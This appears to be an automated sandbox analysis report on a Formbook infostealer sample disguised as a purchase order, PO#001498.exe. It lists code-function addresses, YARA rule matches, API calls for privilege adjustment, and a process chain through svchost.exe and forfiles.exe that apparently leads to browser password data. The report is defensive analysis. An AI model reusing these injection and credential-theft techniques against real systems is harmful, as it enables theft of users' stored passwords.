Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038452A0 8_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385B2C0 8_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E12ED 8_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384B1B0 8_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387516C 8_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382F172 8_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0390B16B 8_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EF0CC 8_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038470C0 8_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F70E9 8_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FF0E0 8_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FF7B0 8_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F16CC 8_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03885630 8_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DD5B0 8_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039095C3 8_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F7571 8_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FF43F 8_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03831460 8_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385FB80 8_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B5BF0 8_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387DBF9 8_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FFB76 8_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DDAAC 8_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03885AA0 8_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E1AA3 8_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EDAC6 8_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FFA49 8_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F7A46 8_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B3A6C 8_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D5910 8_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03849950 8_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385B950 8_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038438E0 8_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038AD800 8_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03841F92 8_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FFFB1 8_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03803FD2 8_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03803FD5 8_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FFF09 8_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03849EB0 8_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385FDC0 8_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03843D40 8_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F1D5A 8_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F7D73 8_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FFCF2 8_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B9C32 8_2_038B9C32
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04811EAA 11_2_04811EAA
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04813C52 11_2_04813C52
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04813C54 11_2_04813C54
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481A58F 11_2_0481A58F
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_0481A594 11_2_0481A594
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_048081E5 11_2_048081E5
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04832A84 11_2_04832A84
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04811EF4 11_2_04811EF4
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Code function: 11_2_04813E74 11_2_04813E74
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C6E4F6 12_2_04C6E4F6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C72446 12_2_04C72446
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C64420 12_2_04C64420
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C80591 12_2_04C80591
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC0535 12_2_04BC0535
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BDC6E0 12_2_04BDC6E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BBC7C0 12_2_04BBC7C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC0770 12_2_04BC0770
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BE4750 12_2_04BE4750
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C52000 12_2_04C52000
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C781CC 12_2_04C781CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C801AA 12_2_04C801AA
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C741A2 12_2_04C741A2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C48158 12_2_04C48158
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BB0100 12_2_04BB0100
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C5A118 12_2_04C5A118
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C402C0 12_2_04C402C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C60274 12_2_04C60274
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C803E6 12_2_04C803E6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BCE3F0 12_2_04BCE3F0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7A352 12_2_04C7A352
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BB0CF2 12_2_04BB0CF2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C60CB5 12_2_04C60CB5
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC0C00 12_2_04BC0C00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BD8DBF 12_2_04BD8DBF
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BBADE0 12_2_04BBADE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BCAD00 12_2_04BCAD00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C5CD1F 12_2_04C5CD1F
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7EEDB 12_2_04C7EEDB
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BD2E90 12_2_04BD2E90
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7CE93 12_2_04C7CE93
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7EE26 12_2_04C7EE26
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC0E59 12_2_04BC0E59
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BCCFE0 12_2_04BCCFE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C3EFA0 12_2_04C3EFA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BB2FC8 12_2_04BB2FC8
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C34F40 12_2_04C34F40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BE0F30 12_2_04BE0F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C02F28 12_2_04C02F28
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C62F30 12_2_04C62F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BA68B8 12_2_04BA68B8
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BEE8F0 12_2_04BEE8F0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC2840 12_2_04BC2840
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BCA840 12_2_04BCA840
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC29A0 12_2_04BC29A0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C8A9A6 12_2_04C8A9A6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BD6962 12_2_04BD6962
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BBEA80 12_2_04BBEA80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C76BD7 12_2_04C76BD7
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7AB40 12_2_04C7AB40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BB1460 12_2_04BB1460
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7F43F 12_2_04C7F43F
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C895C3 12_2_04C895C3
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C5D5B0 12_2_04C5D5B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C77571 12_2_04C77571
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C716CC 12_2_04C716CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C05630 12_2_04C05630
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7F7B0 12_2_04C7F7B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C6F0CC 12_2_04C6F0CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7F0E0 12_2_04C7F0E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C770E9 12_2_04C770E9
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC70C0 12_2_04BC70C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BCB1B0 12_2_04BCB1B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C8B16B 12_2_04C8B16B
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BAF172 12_2_04BAF172
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF516C 12_2_04BF516C
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC52A0 12_2_04BC52A0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C612ED 12_2_04C612ED
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BDB2C0 12_2_04BDB2C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C0739A 12_2_04C0739A
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7132D 12_2_04C7132D
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BAD34C 12_2_04BAD34C
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7FCF2 12_2_04C7FCF2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C39C32 12_2_04C39C32
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BDFDC0 12_2_04BDFDC0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C71D5A 12_2_04C71D5A
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C77D73 12_2_04C77D73
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC3D40 12_2_04BC3D40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC9EB0 12_2_04BC9EB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC1F92 12_2_04BC1F92
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04B83FD2 12_2_04B83FD2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04B83FD5 12_2_04B83FD5
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7FFB1 12_2_04C7FFB1
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7FF09 12_2_04C7FF09
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC38E0 12_2_04BC38E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C2D800 12_2_04C2D800
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C55910 12_2_04C55910
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BC9950 12_2_04BC9950
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BDB950 12_2_04BDB950
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C6DAC6 12_2_04C6DAC6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C05AA0 12_2_04C05AA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C61AA3 12_2_04C61AA3
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C5DAAC 12_2_04C5DAAC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C77A46 12_2_04C77A46
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7FA49 12_2_04C7FA49
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C33A6C 12_2_04C33A6C
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C35BF0 12_2_04C35BF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BDFB80 12_2_04BDFB80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BFDBF9 12_2_04BFDBF9
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04C7FB76 12_2_04C7FB76
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CC1CD0 12_2_02CC1CD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CBAEB0 12_2_02CBAEB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CBCE30 12_2_02CBCE30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CBCC0E 12_2_02CBCC0E
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CBCC10 12_2_02CBCC10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CC5360 12_2_02CC5360
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CB11A1 12_2_02CB11A1
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CC354B 12_2_02CC354B
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CC3550 12_2_02CC3550
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CDBA40 12_2_02CDBA40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7E443 12_2_04A7E443
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7E7DD 12_2_04A7E7DD
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7E324 12_2_04A7E324
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7E304 12_2_04A7E304
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7D848 12_2_04A7D848
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04A7E96C 12_2_04A7E96C
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0382B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04C3F290 appears 105 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04BAB970 appears 277 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04C2EA12 appears 86 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04BF5130 appears 58 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04C07E54 appears 111 times
Source: C:\Users\user\Desktop\PO#001498.exe Code function: String function: 00445975 appears 65 times
Source: C:\Users\user\Desktop\PO#001498.exe Code function: String function: 0041171A appears 37 times
Source: C:\Users\user\Desktop\PO#001498.exe Code function: String function: 0041718C appears 45 times
Source: C:\Users\user\Desktop\PO#001498.exe Code function: String function: 0040E6D0 appears 35 times
Source: PO#001498.exe, 00000000.00000003.1306635256.000000000497D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO#001498.exe
Source: PO#001498.exe, 00000000.00000003.1306440239.00000000047D3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO#001498.exe
Source: PO#001498.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/9
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW, 0_2_0044AF5C
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464422
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D517
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle, 0_2_0043701F
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket, 0_2_0047A999
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043614F
Source: C:\Users\user\Desktop\PO#001498.exe File created: C:\Users\user~1\AppData\Local\Temp\gobioid Jump to behavior
Source: PO#001498.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO#001498.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: forfiles.exe, 0000000C.00000002.3122100683.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1962799301.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1962741811.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3122100683.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO#001498.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\PO#001498.exe File read: C:\Users\user\Desktop\PO#001498.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO#001498.exe "C:\Users\user\Desktop\PO#001498.exe"
Source: C:\Users\user\Desktop\PO#001498.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO#001498.exe"
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO#001498.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO#001498.exe" Jump to behavior
